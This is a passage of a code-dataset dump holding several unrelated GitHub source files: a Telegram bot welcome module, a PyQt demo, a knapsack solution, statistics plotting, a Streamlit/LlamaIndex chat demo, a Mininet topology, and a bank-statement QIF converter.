user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef reset_welcome(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n 
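# overwrite any custom template with the module-level default welcome\n    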
sql.set_custom_welcome(chat.id, sql.DEFAULT_WELCOME, sql.Types.TEXT)\n update.effective_message.reply_text(\"Успешно сброшено приветственное сообщение по умолчанию!\")\n return \"{}:\" \\\n \"\\n#RESET_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nВосстановить приветственное сообщение по умолчанию.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef set_goodbye(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n text, data_type, content, buttons = get_welcome_type(msg)\n\n if data_type is None:\n msg.reply_text(\"Вы не указали, что ответить остроумием!\")\n return \"\"\n\n sql.set_custom_gdbye(chat.id, content or text, data_type, buttons)\n msg.reply_text(\"Пользовательское прощальное сообщение успешно настроено!\")\n return \"{}:\" \\\n \"\\n#SET_GOODBYE\" \\\n \"\\nAdmin: {}\" \\\n \"\\nУстановить прощальное сообщениe.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef reset_goodbye(bot: Bot, update: Update) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n sql.set_custom_gdbye(chat.id, sql.DEFAULT_GOODBYE, sql.Types.TEXT)\n update.effective_message.reply_text(\"Успешно сбросить прощальное сообщение по умолчанию!\")\n return \"{}:\" \\\n \"\\n#RESET_GOODBYE\" \\\n \"\\nAdmin: {}\" \\\n \"\\nСбросить прощальное сообщение.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n\n\n@run_async\n@user_admin\n@loggable\ndef clean_welcome(bot: Bot, update: Update, args: List[str]) -> str:\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n if not args:\n clean_pref = sql.get_clean_pref(chat.id)\n if clean_pref:\n update.effective_message.reply_text(\"Я должен удалить приветственные сообщения два дня назад\")\n else:\n update.effective_message.reply_text(\"В настоящее время я не удаляю старые приветственные сообщения!\")\n return \"\"\n\n if args[0].lower() in (\"on\", \"yes\"):\n sql.set_clean_welcome(str(chat.id), True)\n update.effective_message.reply_text(\"Я попробую удалить старые приветственные сообщения!\")\n return \"{}:\" \\\n \"\\n#CLEAN_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nПереключил чистые приветствия на ON.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n elif args[0].lower() in (\"off\", \"no\"):\n sql.set_clean_welcome(str(chat.id), False)\n update.effective_message.reply_text(\"I won't delete old welcome messages.\")\n return \"{}:\" \\\n \"\\n#CLEAN_WELCOME\" \\\n \"\\nAdmin: {}\" \\\n \"\\nПереключил чистые приветствия на to OFF.\".format(html.escape(chat.title),\n mention_html(user.id, user.first_name))\n else:\n # idek what you're writing, say yes or no\n update.effective_message.reply_text(\"Я понимаю только 'on/yes' или 'off/no'!\")\n return \"\"\n\n\nWELC_HELP_TXT = \"Приветственные/прощальные сообщения вашей группы можно персонализировать разными способами. Если вам нужны сообщения \"\\\n \"для индивидуальной генерации, как и приветственное сообщение по умолчанию, вы можете использовать * эти * переменные:\\n\" \\\n \" - `{{first}}`: это представляет пользователя *first* имя\\n\" \\\n \" - `{{last}}`: это представляет пользователя *last*. 
По умолчанию *first name*, если у пользователя нет \" \\\n \"last name.\\n\" \\\n \" - `{{fullname}}`: это представляет пользователя *full*. По умолчанию * имя *, если у пользователя нет \" \\\n \"last name.\\n\" \\\n \" - `{{username}}`: это представляет пользователя *username*. По умолчанию * упоминание * пользователя\" \\\n \"имя, если нет имени пользователя.\\n\" \\\n \" - `{{mention}}`: это просто * упоминает * пользователя, отмечая его именем.\\n\" \\\n \" - `{{id}}`: это представляет пользователя *id*\\n\" \\\n \" - `{{count}}`: это представляет пользователя *member number*.\\n\" \\\n \" - `{{chatname}}`: это представляет собой *текущее имя чата*.\\n\" \\\n \"\\nКаждая переменная ДОЛЖНА быть окружена символом `{{}}` для замены.\\n\" \\\n \"Приветственные сообщения также поддерживают markdown, поэтому вы можете создавать любые элементы. bold/italic/code/links. \" \\\n \"Кнопки также поддерживаются, так что вы можете сделать свое приветствие потрясающим с помощью красивого вступления. \" \\\n \"кнопки.\\n\" \\\n \"Чтобы создать кнопку, ссылающуюся на ваши правила, используйте это: `[Rules](buttonurl://t.me/{}?start=group_id)`. \" \\\n \"Вы можете даже установить images/gifs/videos/voice сообщения в качестве приветственного сообщения.\".format(dispatcher.bot.username)\n\n\n@run_async\n@user_admin\ndef welcome_help(bot: Bot, update: Update):\n update.effective_message.reply_text(WELC_HELP_TXT, parse_mode=ParseMode.MARKDOWN)\n\n\n# TODO: get welcome data from group butler snap\n# def __import_data__(chat_id, data):\n# welcome = data.get('info', {}).get('rules')\n# welcome = welcome.replace('$username', '{username}')\n# welcome = welcome.replace('$name', '{fullname}')\n# welcome = welcome.replace('$id', '{id}')\n# welcome = welcome.replace('$title', '{chatname}')\n# welcome = welcome.replace('$surname', '{lastname}')\n# welcome = welcome.replace('$rules', '{rules}')\n# sql.set_custom_welcome(chat_id, welcome, sql.Types.TEXT)\n\n\ndef __migrate__(old_chat_id, new_chat_id):\n sql.migrate_chat(old_chat_id, new_chat_id)\n\n\ndef __chat_settings__(chat_id, user_id):\n welcome_pref, _, _ = sql.get_welc_pref(chat_id)\n goodbye_pref, _, _ = sql.get_gdbye_pref(chat_id)\n return \"В этом чате для приветствия установлено значение `{}`.\\n\" \\\n \"А для прощания установлено значение`{}`.\".format(welcome_pref, goodbye_pref)\n\n\n__help__ = \"\"\"\n{}\n\n*Только админам:*\n - /welcome : включить/выключить приветственное сообщение.\n - /welcome: показывает текущие настройки приветствия.\n - /welcome noformat: показывает текущие настройки приветствия, без форматирования - полезно переработать приветственные сообщения!\n - /goodbye -> такое же использование и аргументы, как /welcome.\n - /setwelcome : установить собственное приветственное сообщение. Если используется для ответа на медиа, использует этот медиа.\n - /setgoodbye : установить собственное прощальное сообщение. 
Если используется для ответа на медиа, использует этот медиа.\n - /resetwelcome: Установить стандартное приветсвенное сообщение.\n - /resetgoodbye: установить стандартное прощальное сообщение..\n - /cleanwelcome : На новом участнике попробуйте удалить предыдущее приветственное сообщение, чтобы избежать спама в чате.\n - /welcomehelp: просмотреть дополнительную информацию о форматировании пользовательских приветственных/прощальных сообщений.\n\"\"\".format(WELC_HELP_TXT)\n\n__mod_name__ = \"Приветствие\\Прощание\"\n\nNEW_MEM_HANDLER = MessageHandler(Filters.status_update.new_chat_members, new_member)\nLEFT_MEM_HANDLER = MessageHandler(Filters.status_update.left_chat_member, left_member)\nWELC_PREF_HANDLER = CommandHandler(\"welcome\", welcome, pass_args=True, filters=Filters.group)\nGOODBYE_PREF_HANDLER = CommandHandler(\"goodbye\", goodbye, pass_args=True, filters=Filters.group)\nSET_WELCOME = CommandHandler(\"setwelcome\", set_welcome, filters=Filters.group)\nSET_GOODBYE = CommandHandler(\"setgoodbye\", set_goodbye, filters=Filters.group)\nRESET_WELCOME = CommandHandler(\"resetwelcome\", reset_welcome, filters=Filters.group)\nRESET_GOODBYE = CommandHandler(\"resetgoodbye\", reset_goodbye, filters=Filters.group)\nCLEAN_WELCOME = CommandHandler(\"cleanwelcome\", clean_welcome, pass_args=True, filters=Filters.group)\nWELCOME_HELP = CommandHandler(\"welcomehelp\", welcome_help)\n\ndispatcher.add_handler(NEW_MEM_HANDLER)\ndispatcher.add_handler(LEFT_MEM_HANDLER)\ndispatcher.add_handler(WELC_PREF_HANDLER)\ndispatcher.add_handler(GOODBYE_PREF_HANDLER)\ndispatcher.add_handler(SET_WELCOME)\ndispatcher.add_handler(SET_GOODBYE)\ndispatcher.add_handler(RESET_WELCOME)\ndispatcher.add_handler(RESET_GOODBYE)\ndispatcher.add_handler(CLEAN_WELCOME)\ndispatcher.add_handler(WELCOME_HELP)\n","repo_name":"evilcatsystem/tgbot","sub_path":"tg_bot/modules/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":27162,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6348290384","text":"import sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n\n self.checkBox = QCheckBox('Printer', self)\n self.checkBox.move(150, 50)\n self.checkBox.setFont(QFont('Times New Roman', 16))\n self.checkBox.setCursor(Qt.CursorShape.SizeAllCursor)\n self.checkBox.clicked.connect(self.checkBoxClickedHandler)\n self.checkBox.setTristate(True)\n self.checkBox.setCheckState(Qt.CheckState.PartiallyChecked)\n\n self.pushButtonOk = QPushButton('Ok', self)\n self.pushButtonOk.move(100, 100)\n self.pushButtonOk.resize(QSize(100, 100))\n self.pushButtonOk.clicked.connect(self.buttonOkHandler)\n self.pushButtonOk.setFont(QFont('Times New Roman', 16))\n self.pushButtonOk.setCursor(Qt.CursorShape.IBeamCursor)\n\n def buttonOkHandler(self):\n state = self.checkBox.checkState()\n if state == Qt.CheckState.Checked:\n print('Checked')\n elif state == Qt.CheckState.Unchecked:\n print('Unchecked')\n elif state == Qt.CheckState.PartiallyChecked:\n print('Indeterminate')\n\n\n\n\n def checkBoxClickedHandler(self):\n print('Clicked')\n\napp = QApplication(sys.argv)\nmainWindow = MainWindow()\nmainWindow.show()\napp.exec()","repo_name":"dogancantorun8/python-application","sub_path":"PYQT/deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"19687403202","text":"# SOLUTION :\n# TOP DOWN USING MEMOIZATION\n# Since we have two changing values (capacity and currentIndex) in our recursive \n# function knapsackRecursive(), we can use a two-dimensional array to store the results of all the solved sub-problems.\n# As mentioned above, we need to store results for every sub-array (i.e., for every possible index ‘i’) and every possible capacity ‘c.’\n\n\n\ndef solve_knapsack(profits, weights, capacity):\n\n dp = [[-1 for x in range(capacity + 1)] for y in range(len(profits))]\n\n return recursive_knapsack(dp, profits, weights, capacity, 0)\n\ndef recursive_knapsack(dp, profits, weights, capacity, currentIndex):\n\n #base check\n\n if capacity <= 0 or currentIndex >= len(profits):\n return 0\n\n # check if a value has been calculated and memoized in dp\n\n if dp[currentIndex][capacity] != -1:\n return dp[currentIndex][capacity]\n\n profits1 = 0\n\n if weights[currentIndex] <= capacity:\n profits1 = profits[currentIndex] + recursive_knapsack(dp, profits, weights, capacity - weights[currentIndex],currentIndex + 1)\n\n profits2 = recursive_knapsack(dp, profits, weights, capacity, currentIndex + 1)\n\n dp[currentIndex][capacity] = max(profits1, profits2)\n\n return dp[currentIndex][capacity] \n\n\ndef main():\n print(solve_knapsack([1 ,6, 10, 16], [1, 2, 3 ,5], 7))\n print(solve_knapsack([1, 6, 10, 16], [1, 2, 3, 5], 6))\n\nmain()\n\n\n# Time and Space complexity#\n# Since our memoization array dp[profits.length][capacity+1] stores the results for all subproblems, we can conclude that we will not have more than N*C\n# subproblems (where ‘N’ is the number of items and ‘C’ is the knapsack capacity). This means that our time complexity will be O(N*C)\n\n# The above algorithm will use O(N*C)\n# space for the memoization array. Other than that, we will use O(N)\n# space for the recursion call-stack. 
So the total space complexity will be O(N*C + N)\n# , which is asymptotically equivalent to O(N*C).\n","repo_name":"BethMwangi/alogos-datastructures","sub_path":"knapsack_topdown.py","file_name":"knapsack_topdown.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17236286046","text":"# Plot figure 4.2\n\nimport matplotlib.pyplot as plt\nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nfrom statsmodels import datasets\nimport pandas as pd\nimport numpy as np\n\ndefault = datasets.get_rdataset('Default', 'ISLR').data\n\ndefault['default_cat'] = default.apply(lambda x: int(x['default'] == 'Yes'),\n axis=1)\n\nlinear_model = smf.ols(formula='default_cat ~ balance', data=default)\nlinear_fit = linear_model.fit()\n\nbalance_xx = np.linspace(default['balance'].min(), default['balance'].max())\n\nfig = plt.figure(figsize=(8,4))\nax1 = fig.add_subplot(121)\ndefault.plot(x='balance', y='default_cat', kind='scatter', alpha=0.5, ax=ax1,\n color='brown')\nax1.plot(balance_xx, linear_fit.predict(exog=dict(balance=balance_xx)), c='b',\n linestyle='--')\nax1.axhline(y=0, linestyle='--', color='grey')\nax1.axhline(y=1, linestyle='--', color='grey')\nax1.set_xlabel('Balance')\nax1.set_ylabel('Probability of Default')\n\nlogit_model = smf.logit(formula='default_cat ~ balance', data=default)\nlogit_fit = logit_model.fit()\n\nax2 = fig.add_subplot(122)\ndefault.plot(x='balance', y='default_cat', kind='scatter', alpha=0.5, ax=ax2,\n color='brown')\nax2.plot(balance_xx, logit_fit.predict(exog=dict(balance=balance_xx)), c='b',\n linestyle='--')\nax2.axhline(y=0, linestyle='--', color='grey')\nax2.axhline(y=1, linestyle='--', color='grey')\nax2.set_xlabel('Balance')\nax2.set_ylabel('Probability of Default')\n\nfig.tight_layout()\n","repo_name":"gurbuxanink/Python-Companion-to-ISLR","sub_path":"code/chap4/probDef.py","file_name":"probDef.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44792185970","text":"import sys\n\ninput = sys.stdin.readline\n\nn = int(input())\na = [1]\nb = [0]\n\nfor i in range(n):\n a.append(b[i])\n b.append(b[i] + a[i])\n\nprint(a[-1], end=' ')\nprint(b[-1])\n","repo_name":"sky980221/Algorithm","sub_path":"9625_BABBA/BABBA.py","file_name":"BABBA.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72540420569","text":"squares = []\n\nfor x in range(10):\n squares.append(x*x)\n\n# 기말고사 내기 딱 좋은 문제\nsquares = [x*x for x in range(10) if x % 2 == 0]\n\nprices = [135, -545, 922, 356, -992, 217]\nmprices = [i if i > 0 else 0 for i in prices]\nprint(mprices)\n\nwords = [\"All\", \"good\", \"things\", \"must\", \"come\", \"to\", \"an\", \"end.\"]\nletters = [ w[0] for w in words ]\nprint(letters)\n\nnumbers = [x+y for x in ['a','b','c'] for y in ['x','y','z']]\nprint(numbers)\n\n\n","repo_name":"DAWUNJUNG/python_programming","sub_path":"week_9/11.list_ham.py","file_name":"11.list_ham.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21519333637","text":"import os\nimport json\nfrom urllib.parse import urlparse\nimport streamlit as st\nfrom scrape_utils import scrape\nfrom llama_index import download_loader, GPTSimpleVectorIndex, SimpleDirectoryReader, ServiceContext, 
LLMPredictor, PromptHelper\nfrom llama_index.llm_predictor.chatgpt import ChatGPTLLMPredictor\nfrom llama_index.node_parser import SimpleNodeParser\nfrom langchain import OpenAI\nfrom langchain.agents import Tool\nfrom langchain.agents import initialize_agent\nfrom langchain.chains.conversation.memory import ConversationBufferMemory\nfrom llama_index.langchain_helpers.memory_wrapper import GPTIndexChatMemory\n\nindex_name = \"./index.json\"\ndocuments_folder = \"./documents\"\n\ndef get_index_name(input_urls):\n basepoints = input_urls.split('\\n')\n index_name = \"\"\n for basepoint in basepoints:\n index_name += urlparse(basepoint).netloc.split(\".\")[0] + \"&\"\n return index_name\n \n\ndef load_documents_to_gpt_vectorstore(input_urls):\n index_name = get_index_name(input_urls)\n if os.path.exists(\"../index/\"+index_name+\".json\"):\n print(\"index found\")\n return GPTSimpleVectorIndex.load_from_disk(\"../index/\"+index_name+\".json\")\n else:\n print(\"building new index\")\n basepoints = input_urls.split('\\n')\n endpoints = scrape(basepoints)\n BeautifulSoupWebReader = download_loader(\"BeautifulSoupWebReader\")\n loader = BeautifulSoupWebReader()\n documents = loader.load_data(endpoints)\n parser = SimpleNodeParser()\n \n nodes = parser.get_nodes_from_documents(documents)\n llm_predictor = LLMPredictor(\n llm=OpenAI(temperature=0, model_name=\"text-davinci-003\")\n )\n \n max_input_size = 4096\n num_output = 2048\n max_chunk_overlap = 20\n prompt_helper = PromptHelper(max_input_size, num_output, max_chunk_overlap)\n service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor, prompt_helper=prompt_helper)\n index = GPTSimpleVectorIndex(nodes, service_context=service_context)\n index.save_to_disk(\"../index/\"+index_name+\".json\")\n return index\n\ndef build_conversation(urls):\n index_name = get_index_name(urls)\n if not os.path.exists(\"../index/\"+index_name+\".json\"):\n return \"index not found, click on 'load documents' first\"\n else: print(\"index found\")\n index = GPTSimpleVectorIndex.load_from_disk(\"../index/\"+index_name+\".json\")\n tools = [\n Tool(\n name = \"GPT Index\",\n func=lambda q: str(index.query(q)),\n description=\"useful for when you want to answer questions about the author. The input to this tool should be a complete english sentence.\",\n return_direct=True\n ),\n ]\n memory = GPTIndexChatMemory(\n index=index, \n memory_key=\"chat_history\", \n query_kwargs={\"response_mode\": \"compact\"},\n # return_source returns source nodes instead of querying index\n return_source=True,\n # return_messages returns context in message format\n return_messages=True\n )\n llm=OpenAI(temperature=0, model_name=\"text-davinci-003\")\n st.session_state.agent_chain = initialize_agent(tools, llm, agent=\"conversational-react-description\", memory=memory)\n\ndef chat(query,urls):\n index_name = get_index_name(urls)\n if not os.path.exists(\"../index/\"+index_name+\".json\"):\n return \"index not found, click on 'load documents' first\"\n else: print(\"index found\")\n index = GPTSimpleVectorIndex.load_from_disk(\"../index/\"+index_name+\".json\")\n tools = [\n Tool(\n name = \"GPT Index\",\n func=lambda q: str(index.query(q)),\n description=\"useful for when you want to answer questions about the author. 
The input to this tool should be a complete english sentence.\",\n return_direct=True\n ),\n ]\n memory = GPTIndexChatMemory(\n index=index, \n memory_key=\"chat_history\", \n query_kwargs={\"response_mode\": \"compact\"},\n # return_source returns source nodes instead of querying index\n return_source=True,\n # return_messages returns context in message format\n return_messages=True\n )\n llm=OpenAI(temperature=0, model_name=\"text-davinci-003\")\n agent_chain = initialize_agent(tools, llm, agent=\"conversational-react-description\", memory=memory)\n response = agent_chain.run(input=query)\n \n # response = st.session_state.agent_chain.run(input=query)\n return response\n \n\n# loading openai api key from json file\nwith open('../keys_and_tokens.json', 'r') as f:\n data = json.load(f)\n openai_api_key = data.get(\"openai-api-key\")\n if openai_api_key:\n os.environ[\"OPENAI_API_KEY\"] = openai_api_key\n else:\n print(\"openai_api_key not found in JSON file\")\n\n\nst.header(\"LearnWithGPT Demo\")\nst.session_state.agent_chain = None\n\ndoc_input = st.text_area(\"Enter a URL to scrape and index\")\nif st.button(\"load documents\"):\n st.markdown(load_documents_to_gpt_vectorstore(doc_input))\n build_conversation(doc_input)\n \nuser_input = st.text_area(\"ask about the docs\")\nif st.button(\"Ask\"):\n st.write(chat(user_input, doc_input))\n \n\n# @st.cache_resource\n# def initialize_index(index_name, documents_folder):\n# llm_predictor = ChatGPTLLMPredictor()\n# service_context = ServiceContext.from_defaults(llm_predictor=llm_predictor)\n# if os.path.exists(index_name):\n# index = GPTSimpleVectorIndex.load_from_disk(index_name, service_context=service_context)\n# else:\n# documents = SimpleDirectoryReader(documents_folder).load_data()\n# index = GPTSimpleVectorIndex.from_documents(documents, service_context=service_context)\n# index.save_to_disk(index_name)\n\n# return index\n\n\n# @st.cache_data(max_entries=200, persist=True)\n# def query_index(_index, query_text):\n# response = _index.query(query_text)\n# return str(response)\n\n\n# st.title(\"🦙 Llama Index Demo 🦙\")\n# st.header(\"Welcome to the Llama Index Streamlit Demo\")\n# st.write(\"Enter a query about Paul Graham's essays. You can check out the original essay [here](https://raw.githubusercontent.com/jerryjliu/llama_index/main/examples/paul_graham_essay/data/paul_graham_essay.txt). Your query will be answered using the essay as context, using embeddings from text-ada-002 and LLM completions from ChatGPT. 
You can read more about Llama Index and how this works in [our docs!](https://gpt-index.readthedocs.io/en/latest/index.html)\")\n\n# index = None\n# api_key = st.text_input(\"Enter your OpenAI API key here:\", type=\"password\")\n\n# if api_key:\n# os.environ['OPENAI_API_KEY'] = api_key\n# index = initialize_index(index_name, documents_folder) \n\n\n# if index is None:\n# st.warning(\"Please enter your api key first.\")\n\n# text = st.text_input(\"Query text:\", value=\"What did the author do growing up?\")\n\n# if st.button(\"Run Query\") and text is not None:\n# response = query_index(index, text)\n# st.markdown(response)\n \n# llm_col, embed_col = st.columns(2)\n# with llm_col:\n# st.markdown(f\"LLM Tokens Used: {index.service_context.llm_predictor._last_token_usage}\")\n \n# with embed_col:\n# st.markdown(f\"Embedding Tokens Used: {index.service_context.embed_model._last_token_usage}\")\n","repo_name":"james-310110/LearnWithGPT-deprecated","sub_path":"server/streamlit_demo.py","file_name":"streamlit_demo.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25496764858","text":"from mininet.net import Mininet\nfrom mininet.node import OVSSwitch, Node, Controller, RemoteController\nfrom mininet.cli import CLI\nfrom mininet.log import info, setLogLevel\n\n\nclass LinuxRouter(Node):\n \"A Node with IP forwarding enabled.\"\n\n def config(self, **params):\n super(LinuxRouter, self).config(**params)\n # Enable forwarding on the router\n self.cmd('sysctl net.ipv4.ip_forward=1')\n\n def terminate(self):\n self.cmd('sysctl net.ipv4.ip_forward=0')\n super(LinuxRouter, self).terminate()\n\n\ndef dnsNet():\n \"Create a network to test eth tof adapter\"\n\n net = Mininet(controller=Controller, switch=OVSSwitch)\n\n info(\"*** Creating switches\\n\")\n br_dns = net.addSwitch('br_dns', dpid='1')\n br_servers = net.addSwitch('br_servers', dpid='2')\n\n info(\"*** Creating hosts\\n\")\n info('*** Clients\\n')\n\n clients = []\n for i in range(0, 5):\n clients.append(net.addHost('cl' + str(i),\n ip='10.128.0.' 
+ str(i + 1) + '/24',\n defaultRoute='via 10.128.0.254'))\n\n info('*** Router\\n')\n router = net.addHost('r0', cls=LinuxRouter, ip='10.128.0.254/24')\n\n info('*** Servers\\n')\n s0 = net.addHost('s0', ip='10.128.1.2/24', defaultRoute='via 10.128.1.1')\n s1 = net.addHost('s1', ip='10.128.1.3/24', defaultRoute='via 10.128.1.1')\n\n info('*** Creating the controller\\n')\n c1 = net.addController('c1', controller=RemoteController,\n ip='127.0.0.1', port=6653)\n\n info('*** Creating Links\\n')\n info('*** Hosts\\n')\n for client in clients:\n net.addLink(br_dns, client)\n\n info('*** Router\\n')\n net.addLink(br_dns, router, intfName2='r0-eth0',\n params2={'ip': '10.128.0.254/24'})\n net.addLink(br_servers, router, intfName2='r0-eth1',\n params2={'ip': '10.128.1.1/24'})\n\n info('*** Servers\\n')\n net.addLink(br_servers, s0)\n net.addLink(br_servers, s1)\n\n info(\"*** Starting network\\n\")\n net.build()\n br_servers.start([c1])\n br_dns.start([c1])\n\n info('*** Add flows\\n')\n br_servers.dpctl('add-flow', 'actions=OUTPUT:NORMAL')\n\n info('*** Starting HTTP Servers\\n')\n s0.cmd('sudo python -m SimpleHTTPServer 80 >& /tmp/http.log &')\n s1.cmd('sudo python -m SimpleHTTPServer 80 >& /tmp/http.log &')\n\n info(\"*** Running CLI\\n\")\n CLI(net)\n\n info(\"*** Stopping network\\n\")\n net.stop()\n\nif __name__ == '__main__':\n setLogLevel('info') # for CLI output\n dnsNet()\n","repo_name":"wnke/SDN_RYU_DNS","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32154399188","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Bout (read bank-out) extracts transactions from pdf bank statements.\n\n _ _\n(_) (_)\n(_) _ _ _ _ _ _ _ _ _ (_) _ _\n(_)(_)(_)(_)_ _ (_)(_)(_) _ (_) (_)(_)(_)(_)(_)\n(_) (_)(_) (_)(_) (_) (_)\n(_) (_)(_) (_)(_) (_) (_) _\n(_) _ _ _(_)(_) _ _ _ (_)(_)_ _ _(_)_ (_)_ _(_)\n(_)(_)(_)(_) (_)(_)(_) (_)(_)(_) (_) (_)(_)\n\n\"\"\"\nimport io\nimport logging\nimport click\nimport csv\nfrom collections import namedtuple\nfrom datetime import datetime\n\nlogger = logging.getLogger(\"bout\")\n\nprofiles = {}\nTransaction = namedtuple(\"Transaction\",\n [\"id\", \"date\", \"payee\", \"memo\", \"amount\"])\nInvalidTransaction = namedtuple(\"InvalidTransaction\", [])\n\n\ndef get_icici_csv(data_row):\n \"\"\"Convert a transaction row to tuple.\n\n Details of fields\n 0: 'D', # Transaction date\n 2: 'M', # Transaction details\n 3: 'T', # Deposit\n 4: 'T-', # Withdrawal\n \"\"\"\n logger.debug(\"get_icicicsv: Data row = {}\".format(data_row))\n date = data_row[0].replace('-', '/')\n if _valid_date(date):\n amt = \"-{}\".format(data_row[4])\n if data_row[3] != \"0\":\n amt = data_row[3]\n return Transaction(id=0,\n date=date,\n payee=\"\", # Empty for ICICI bank account\n memo=data_row[2],\n amount=amt)\n return InvalidTransaction()\n\n\ndef get_icicicc_csv(data_row):\n \"\"\"Convert a transaction row to tuple.\n\n Details of fields\n 0: 'D', # Transaction date\n 2: 'M', # Transaction details\n 5: 'T', # Amount\n \"\"\"\n logger.debug(\"get_icicicsv: Data row = {}\".format(data_row))\n date = data_row[0]\n if _valid_date(date, date_format=\"%d/%m/%Y\"):\n amt = \"-{}\".format(data_row[5])\n if data_row[6] == \"CR\":\n amt = data_row[5]\n return Transaction(id=0,\n date=date,\n payee=\"\", # Empty for ICICI bank account\n memo=data_row[2],\n amount=amt)\n return InvalidTransaction()\n\n\ndef qif_header():\n \"\"\"Print qif header.\"\"\"\n 
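# placeholder account block (NMyAccount/TMyBank) terminated by ^, then the !Type:Bank section marker\n    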
click.echo(\"!Account\\nNMyAccount\\nTMyBank\\n^\\n!Type:Bank\")\n\n\ndef to_qif(transaction):\n \"\"\"Transform a cleaned up row to qif format.\n\n Returns:\n string of a particular transaction in qif format\n\n See wikipedia for more details of QIF format.\n https://en.wikipedia.org/wiki/Quicken_Interchange_Format#Detail_items\n\n \"\"\"\n logger.debug(\"to_qif: Input = {}\".format(transaction))\n return \"D{0}\\nM{1}\\nT{2}\\n^\\n\\n\"\\\n .format(transaction.date, transaction.memo, transaction.amount)\n\n\ndef _valid_date(date_value, date_format=\"%d/%m/%Y\"):\n \"\"\"Validate a transaction date.\"\"\"\n try:\n transaction_date = datetime.strptime(date_value, date_format)\n return transaction_date is not None\n except ValueError:\n return False\n\n\ndef _filter_csv_header(doc, header):\n head_skip = False\n mem = io.StringIO()\n with open(doc, encoding='utf-8', mode='r') as f:\n for line in f:\n if line.startswith(header):\n head_skip = True\n continue\n if head_skip and (not line or line.isspace()):\n break\n if head_skip and ',' in line:\n mem.write(line)\n mem.seek(0)\n return csv.reader(mem)\n\n\n@click.command()\n@click.argument(\"doc\", type=click.Path(exists=True))\n@click.option(\"--profile\", prompt=\"Choose a profile\", default=\"icici\",\n show_default=True,\n type=click.Choice([\"icici\", \"icicicc\"]),\n help=\"Document type profile.\")\n@click.option(\"--debug\", is_flag=True, show_default=True,\n help=\"Show diagnostic messages.\")\ndef start(doc, profile, debug):\n \"\"\"Bout (read bank-out) extracts transactions from csv bank statements.\"\"\"\n if debug:\n logging.basicConfig(level=logging.DEBUG)\n logger.info(\"Verbose messages are enabled.\")\n\n profiles.update({\"icici\": get_icici_csv,\n \"icicicc\": get_icicicc_csv})\n\n rows = []\n if profile == \"icici\":\n header = \"DATE,MODE,PARTICULARS,DEPOSITS,WITHDRAWALS,BALANCE\"\n rows = _filter_csv_header(doc, header)\n elif profile == \"icicicc\":\n header = \"Date,Sr.No.,Transaction Details,Reward Point Header,Intl.Amount,Amount(in Rs),BillingAmountSign\"\n rows = _filter_csv_header(doc, header)\n\n # row -> clean_row\n # clean_row, profile -> transaction\n # transaction -> qif\n create_transaction = profiles[profile]\n print_header = False\n for r in rows:\n transaction = create_transaction(r)\n if type(transaction) is not InvalidTransaction:\n if not print_header:\n qif_header()\n print_header = True\n click.echo(to_qif(transaction))\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"codito/bout","sub_path":"bout.py","file_name":"bout.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"18455364460","text":"import numpy as np\nimport h5py\nfrom sklearn.model_selection import train_test_split\n\nclass CreateDatasetPackage():\n def __init__(self, filename, dataset_name = \"FullData\", keys=[\"X\", \"Y\"]):\n \"\"\"\n Creates a new dataset h5 file with train, test and validation datasets with\n the requested shape\n Parameters\n ----------\n filename : name of the file\n dataset_name : key name in the h5 file\n keys : keys inside dataset_name\n \"\"\"\n self._filename = filename\n self._dataset_name = dataset_name\n self._array = {}\n self._keys = [\"X\", \"Y\"]\n self.train = {}\n self.test = {}\n self.valid = {}\n\n with h5py.File(filename, \"r\") as h5_f:\n for index, name in zip(self._keys, keys):\n key = f\"{self._dataset_name}/{name}\"\n\n if key not in h5_f:\n raise LookupError(f\"Data {key} is not 
